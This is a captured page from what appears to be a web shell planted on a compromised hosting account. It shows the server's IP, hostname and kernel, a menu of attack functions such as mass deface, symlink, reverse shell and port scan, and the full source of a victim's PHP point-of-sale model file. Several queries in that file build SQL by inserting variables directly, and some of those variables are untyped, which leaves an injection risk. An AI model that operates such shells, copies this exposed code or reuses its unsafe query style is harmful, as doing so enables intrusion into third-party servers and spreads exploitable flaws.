Tul xxx Tul
User / IP
:
216.73.216.159
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
vendefacil2
/
models
/
Viewing: VentaspedientesModel.php
<?php class VentaspedientesModel extends Query { public function __construct() { parent::__construct(); } public function getEmpresa($id_sucursal) { $sql = "SELECT * FROM sucursales WHERE id = $id_sucursal"; return $this->select($sql); } public function getPendientes($id_sucursal) { $sql = "SELECT vp.* FROM ventas_pendientes vp WHERE vp.id_sucursal = $id_sucursal ORDER BY vp.id DESC"; return $this->selectAll($sql); } public function getPendienteBySucursal(int $id, int $id_sucursal) { $sql = "SELECT * FROM ventas_pendientes WHERE id = $id AND id_sucursal = $id_sucursal"; return $this->select($sql); } public function getSerieVenta(int $id_sucursal) { $sql = "SELECT MAX(id) AS total FROM ventas WHERE id_sucursal = $id_sucursal"; return $this->select($sql); } public function getProducto(int $idProducto) { $sql = "SELECT p.*, m.marca FROM productos p INNER JOIN marcas m ON p.id_marca = m.id WHERE p.id = $idProducto"; return $this->select($sql); } public function getCaja(int $id_sucursal) { $idUsuario = isset($_SESSION['id_usuario']) ? (int)$_SESSION['id_usuario'] : 0; $filtroUsuario = empty($_SESSION['rol']) ? '' : " AND id_usuario = $idUsuario"; $idCajaActiva = isset($_SESSION['id_caja_activa']) ? (int)$_SESSION['id_caja_activa'] : 0; if ($idCajaActiva > 0) { $sql = "SELECT * FROM cajas WHERE estado = 1 AND id_sucursal = $id_sucursal AND id = $idCajaActiva" . $filtroUsuario . " ORDER BY id DESC"; $cajaActiva = $this->select($sql); if (!empty($cajaActiva)) { return $cajaActiva; } } $sql = "SELECT * FROM cajas WHERE estado = 1 AND id_sucursal = $id_sucursal" . $filtroUsuario . " ORDER BY id DESC"; return $this->select($sql); } public function actualizarStock(int $cantidad, int $ventas, int $idProducto) { $sql = "UPDATE productos SET cantidad = ?, ventas=? WHERE id = ?"; $array = array($cantidad, $ventas, $idProducto); return $this->save($sql, $array); } public function registrarMovimiento(string $movimiento, string $accion, int $cantidad, int $stockActual, int $idProducto, int $id_usuario, int $id_sucursal) { $sql = "INSERT INTO inventario (movimiento, accion, cantidad, stock_actual, id_producto, id_usuario, id_sucursal) VALUES (?,?,?,?,?,?,?)"; $array = array($movimiento, $accion, $cantidad, $stockActual, $idProducto, $id_usuario, $id_sucursal); return $this->insertar($sql, $array); } public function registrarVenta($productos, $total, $totalConImpuesto, $fecha, $hora, $metodo, $descuento, $ivaMonto, $retencionMonto, $totalFinal, $impuesto, $moneda, $serie, $pago, $id_caja, $idCliente, $idusuario, $id_sucursal, $nota) { $sql = "INSERT INTO ventas (productos, total, totalConImpuesto, fecha, hora, metodo, descuento, iva_monto, retencion_monto, total_final, impuesto, moneda, serie, pago, id_caja, id_cliente, id_usuario, id_sucursal, nota) VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)"; $array = array($productos, $total, $totalConImpuesto, $fecha, $hora, $metodo, $descuento, $ivaMonto, $retencionMonto, $totalFinal, $impuesto, $moneda, $serie, $pago, $id_caja, $idCliente, $idusuario, $id_sucursal, $nota); return $this->insertar($sql, $array); } public function getOrCreateCliente($identidad, $num_identidad, $nombre, $telefono, $correo, $direccion, $id_sucursal) { $identidadQ = $this->quoteValueQuery($identidad); $numQ = $this->quoteValueQuery($num_identidad); $sqlBuscar = "SELECT id FROM clientes WHERE identidad = $identidadQ AND num_identidad = $numQ AND id_sucursal = $id_sucursal LIMIT 1"; $existe = $this->select($sqlBuscar); if (!empty($existe['id'])) { return (int)$existe['id']; } $sql = "INSERT INTO clientes (identidad, num_identidad, nombre, telefono, correo, direccion, id_sucursal) VALUES (?,?,?,?,?,?,?)"; $array = array($identidad, $num_identidad, $nombre, $telefono, $correo, $direccion, $id_sucursal); return $this->insertar($sql, $array); } public function aprobarPendiente(int $id, string $fechaProcesado, int $id_usuario_procesa, int $venta_id) { $sql = "UPDATE ventas_pendientes SET estado = ?, fecha_procesado = ?, id_usuario_procesa = ?, venta_id = ? WHERE id = ?"; return $this->save($sql, [1, $fechaProcesado, $id_usuario_procesa, $venta_id, $id]); } public function rechazarPendiente(int $id, $motivo, string $fechaProcesado, int $id_usuario_procesa) { $sql = "UPDATE ventas_pendientes SET estado = ?, motivo = ?, fecha_procesado = ?, id_usuario_procesa = ? WHERE id = ?"; return $this->save($sql, [2, $motivo, $fechaProcesado, $id_usuario_procesa, $id]); } public function eliminarPendiente(int $id, int $id_sucursal) { $sql = "DELETE FROM ventas_pendientes WHERE id = ? AND id_sucursal = ?"; return $this->save($sql, [$id, $id_sucursal]); } }
Coded With 💗 by
0x6ick